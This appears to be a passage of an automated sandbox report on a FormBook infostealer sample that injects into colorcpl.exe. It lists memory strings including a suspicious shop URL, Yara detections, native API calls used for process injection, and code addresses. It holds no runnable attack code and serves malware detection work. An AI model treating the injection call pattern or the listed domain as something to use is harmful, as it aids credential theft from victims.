Source: colorcpl.exe, 00000007.00000002.4471538704.00000000033EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: colorcpl.exe, 00000007.00000002.4471538704.000000000340A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: colorcpl.exe, 00000007.00000002.4471538704.00000000033EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: colorcpl.exe, 00000007.00000002.4471538704.00000000033EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: colorcpl.exe, 00000007.00000002.4471538704.000000000340A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: colorcpl.exe, 00000007.00000003.2432278249.0000000008620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: colorcpl.exe, 00000007.00000002.4473670706.0000000006954000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4475520630.00000000082F0000.00000004.00000800.00020000.00000000.sdmp, tWcBthnLrDi.exe, 00000008.00000002.4472994884.0000000004444000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tWcBthnLrDi.exe, 00000008.00000002.4472994884.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.jexiz.shop/li8d/?1Zgl=sm

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.18in SPA-198-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.18in SPA-198-2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4472767569.0000000005070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4474644674.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4472840073.00000000050C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2248027115.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2249648463.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4472773196.0000000004020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0042C433 NtClose,	4_2_0042C433
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0040A9E3 NtDelayExecution,	4_2_0040A9E3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252B60 NtClose,LdrInitializeThunk,	4_2_01252B60
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01252DF0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_01252C70
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012535C0 NtCreateMutant,LdrInitializeThunk,	4_2_012535C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01254340 NtSetContextThread,	4_2_01254340
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01254650 NtSuspendThread,	4_2_01254650
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252BA0 NtEnumerateValueKey,	4_2_01252BA0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252B80 NtQueryInformationFile,	4_2_01252B80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252BE0 NtQueryValueKey,	4_2_01252BE0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252BF0 NtAllocateVirtualMemory,	4_2_01252BF0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252AB0 NtWaitForSingleObject,	4_2_01252AB0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252AF0 NtWriteFile,	4_2_01252AF0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252AD0 NtReadFile,	4_2_01252AD0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252D30 NtUnmapViewOfSection,	4_2_01252D30
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252D00 NtSetInformationFile,	4_2_01252D00
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252D10 NtMapViewOfSection,	4_2_01252D10
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252DB0 NtEnumerateKey,	4_2_01252DB0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252DD0 NtDelayExecution,	4_2_01252DD0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252C00 NtQueryInformationProcess,	4_2_01252C00
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252C60 NtCreateKey,	4_2_01252C60
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252CA0 NtQueryInformationToken,	4_2_01252CA0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252CF0 NtOpenProcess,	4_2_01252CF0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252CC0 NtQueryVirtualMemory,	4_2_01252CC0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252F30 NtCreateSection,	4_2_01252F30
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252F60 NtCreateProcessEx,	4_2_01252F60
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252FA0 NtQuerySection,	4_2_01252FA0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252FB0 NtResumeThread,	4_2_01252FB0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252F90 NtProtectVirtualMemory,	4_2_01252F90
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252FE0 NtCreateFile,	4_2_01252FE0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252E30 NtWriteVirtualMemory,	4_2_01252E30
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252EA0 NtAdjustPrivilegesToken,	4_2_01252EA0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252E80 NtReadVirtualMemory,	4_2_01252E80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01252EE0 NtQueueApcThread,	4_2_01252EE0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01253010 NtOpenDirectoryObject,	4_2_01253010
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01253090 NtSetValueKey,	4_2_01253090
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012539B0 NtGetContextThread,	4_2_012539B0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01253D10 NtOpenProcessToken,	4_2_01253D10
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01253D70 NtOpenThread,	4_2_01253D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05234650 NtSuspendThread,LdrInitializeThunk,	7_2_05234650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05234340 NtSetContextThread,LdrInitializeThunk,	7_2_05234340
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_05232D30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_05232D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_05232DF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232DD0 NtDelayExecution,LdrInitializeThunk,	7_2_05232DD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232C60 NtCreateKey,LdrInitializeThunk,	7_2_05232C60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_05232C70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_05232CA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232F30 NtCreateSection,LdrInitializeThunk,	7_2_05232F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232FB0 NtResumeThread,LdrInitializeThunk,	7_2_05232FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232FE0 NtCreateFile,LdrInitializeThunk,	7_2_05232FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_05232E80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_05232EE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232B60 NtClose,LdrInitializeThunk,	7_2_05232B60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_05232BA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_05232BE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_05232BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232AF0 NtWriteFile,LdrInitializeThunk,	7_2_05232AF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232AD0 NtReadFile,LdrInitializeThunk,	7_2_05232AD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052335C0 NtCreateMutant,LdrInitializeThunk,	7_2_052335C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052339B0 NtGetContextThread,LdrInitializeThunk,	7_2_052339B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232D00 NtSetInformationFile,	7_2_05232D00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232DB0 NtEnumerateKey,	7_2_05232DB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232C00 NtQueryInformationProcess,	7_2_05232C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232CF0 NtOpenProcess,	7_2_05232CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232CC0 NtQueryVirtualMemory,	7_2_05232CC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232F60 NtCreateProcessEx,	7_2_05232F60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232FA0 NtQuerySection,	7_2_05232FA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232F90 NtProtectVirtualMemory,	7_2_05232F90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232E30 NtWriteVirtualMemory,	7_2_05232E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232EA0 NtAdjustPrivilegesToken,	7_2_05232EA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232B80 NtQueryInformationFile,	7_2_05232B80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232AB0 NtWaitForSingleObject,	7_2_05232AB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05233010 NtOpenDirectoryObject,	7_2_05233010
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05233090 NtSetValueKey,	7_2_05233090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05233D10 NtOpenProcessToken,	7_2_05233D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05233D70 NtOpenThread,	7_2_05233D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03318EC0 NtCreateFile,	7_2_03318EC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03319320 NtAllocateVirtualMemory,	7_2_03319320
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03319120 NtDeleteFile,	7_2_03319120
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_033191C0 NtClose,	7_2_033191C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03319030 NtReadFile,	7_2_03319030

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_00B4DB8C	0_2_00B4DB8C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088BA8B0	0_2_088BA8B0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088B7868	0_2_088B7868
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088B6190	0_2_088B6190
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088B0378	0_2_088B0378
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088BA8A0	0_2_088BA8A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088B7859	0_2_088B7859
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088BAB39	0_2_088BAB39
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088BAB48	0_2_088BAB48
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088B9CA0	0_2_088B9CA0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088B6181	0_2_088B6181
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 0_2_088B0369	0_2_088B0369
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_004183D3	4_2_004183D3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_00401110	4_2_00401110
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0040E13B	4_2_0040E13B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0042EAD3	4_2_0042EAD3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_00402370	4_2_00402370
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0040FCC3	4_2_0040FCC3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_00416613	4_2_00416613
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0040FEE3	4_2_0040FEE3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0040DF63	4_2_0040DF63
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_00402710	4_2_00402710
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_00402FD0	4_2_00402FD0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01210100	4_2_01210100
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BA118	4_2_012BA118
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A8158	4_2_012A8158
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E01AA	4_2_012E01AA
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D41A2	4_2_012D41A2
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D81CC	4_2_012D81CC
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B2000	4_2_012B2000
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DA352	4_2_012DA352
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E03E6	4_2_012E03E6
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122E3F0	4_2_0122E3F0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0274	4_2_012C0274
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A02C0	4_2_012A02C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220535	4_2_01220535
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E0591	4_2_012E0591
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C4420	4_2_012C4420
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D2446	4_2_012D2446
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012CE4F6	4_2_012CE4F6
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220770	4_2_01220770
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01244750	4_2_01244750
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121C7C0	4_2_0121C7C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123C6E0	4_2_0123C6E0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01236962	4_2_01236962
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012EA9A6	4_2_012EA9A6
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01222840	4_2_01222840
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122A840	4_2_0122A840
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012068B8	4_2_012068B8
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124E8F0	4_2_0124E8F0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DAB40	4_2_012DAB40
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D6BD7	4_2_012D6BD7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121EA80	4_2_0121EA80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122AD00	4_2_0122AD00
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BCD1F	4_2_012BCD1F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01238DBF	4_2_01238DBF
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121ADE0	4_2_0121ADE0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220C00	4_2_01220C00
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C0CB5	4_2_012C0CB5
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01210CF2	4_2_01210CF2
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01262F28	4_2_01262F28
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01240F30	4_2_01240F30
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C2F30	4_2_012C2F30
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01294F40	4_2_01294F40
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129EFA0	4_2_0129EFA0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122CFE0	4_2_0122CFE0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01212FC8	4_2_01212FC8
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DEE26	4_2_012DEE26
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220E59	4_2_01220E59
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01232E90	4_2_01232E90
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DCE93	4_2_012DCE93
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DEEDB	4_2_012DEEDB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012EB16B	4_2_012EB16B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0125516C	4_2_0125516C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120F172	4_2_0120F172
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122B1B0	4_2_0122B1B0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D70E9	4_2_012D70E9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DF0E0	4_2_012DF0E0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012CF0CC	4_2_012CF0CC
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012270C0	4_2_012270C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D132D	4_2_012D132D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120D34C	4_2_0120D34C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0126739A	4_2_0126739A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012252A0	4_2_012252A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C12ED	4_2_012C12ED
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123B2C0	4_2_0123B2C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D7571	4_2_012D7571
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BD5B0	4_2_012BD5B0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DF43F	4_2_012DF43F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01211460	4_2_01211460
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DF7B0	4_2_012DF7B0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01265630	4_2_01265630
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D16CC	4_2_012D16CC
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B5910	4_2_012B5910
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01229950	4_2_01229950
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123B950	4_2_0123B950
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128D800	4_2_0128D800
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012238E0	4_2_012238E0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DFB76	4_2_012DFB76
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123FB80	4_2_0123FB80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01295BF0	4_2_01295BF0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0125DBF9	4_2_0125DBF9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01293A6C	4_2_01293A6C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DFA49	4_2_012DFA49
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D7A46	4_2_012D7A46
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01265AA0	4_2_01265AA0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BDAAC	4_2_012BDAAC
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C1AA3	4_2_012C1AA3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012CDAC6	4_2_012CDAC6
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D7D73	4_2_012D7D73
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01223D40	4_2_01223D40
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D1D5A	4_2_012D1D5A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123FDC0	4_2_0123FDC0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01299C32	4_2_01299C32
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DFCF2	4_2_012DFCF2
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DFF09	4_2_012DFF09
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DFFB1	4_2_012DFFB1
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01221F92	4_2_01221F92
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_011E3FD5	4_2_011E3FD5
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_011E3FD2	4_2_011E3FD2
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01229EB0	4_2_01229EB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05200535	7_2_05200535
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052C0591	7_2_052C0591
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A4420	7_2_052A4420
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B2446	7_2_052B2446
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052AE4F6	7_2_052AE4F6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05200770	7_2_05200770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05224750	7_2_05224750
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051FC7C0	7_2_051FC7C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0521C6E0	7_2_0521C6E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051F0100	7_2_051F0100
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0529A118	7_2_0529A118
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05288158	7_2_05288158
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052C01AA	7_2_052C01AA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B41A2	7_2_052B41A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B81CC	7_2_052B81CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05292000	7_2_05292000
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BA352	7_2_052BA352
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052C03E6	7_2_052C03E6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0520E3F0	7_2_0520E3F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A0274	7_2_052A0274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052802C0	7_2_052802C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0520AD00	7_2_0520AD00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0529CD1F	7_2_0529CD1F
